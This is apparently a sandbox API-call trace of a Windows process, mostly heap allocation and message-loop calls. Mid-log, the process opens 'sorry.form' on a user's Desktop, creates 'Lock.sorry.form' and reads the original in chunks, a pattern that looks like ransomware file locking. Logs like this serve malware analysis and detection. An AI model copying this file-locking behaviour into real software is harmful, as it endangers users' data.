HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0206.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0206.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0206.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0206.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0206.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.517] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0206.517] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0206.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0206.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0206.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0206.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0206.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0206.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0206.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0206.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0206.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0206.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0206.565] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/sorry.form" (normalized: "c:\\users\\fd1hvy\\desktop\\sorry.form"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0206.565] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.565] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0206.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0206.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0206.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0206.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0206.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0206.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0206.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0206.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0206.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0206.566] TranslateMessage (lpMsg=0x8cf708) returned 0 [0206.566] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0206.566] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0206.566] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0206.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0206.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0206.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0206.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0206.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0206.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0206.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0206.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0206.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0206.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0206.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0206.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0206.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0206.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0206.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0206.567] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0206.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0206.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0206.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0206.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0206.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0206.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0206.568] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.sorry.form" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.sorry.form"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0206.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0206.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0206.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0206.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0206.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0206.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0206.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0206.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0206.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0206.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0206.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0206.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0206.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0206.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0206.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0206.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0206.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5d020 [0206.575] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0206.575] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.580] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.582] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.584] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.587] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.590] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.592] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.594] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.597] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.682] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.684] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.687] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.689] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.692] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.694] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.696] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0206.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0206.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0206.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0206.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0206.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf6c020 [0206.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5d020 | out: hHeap=0x970000) returned 1 [0206.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0206.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0206.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0206.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0206.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0206.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0206.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0206.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5e020 [0206.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf6c020 | out: hHeap=0x970000) returned 1 [0206.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.896] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0206.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0206.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0206.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0206.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0206.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf61020 [0206.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0206.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf61020 | out: hHeap=0x970000) returned 1 [0206.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0206.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0206.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0206.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0207.102] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 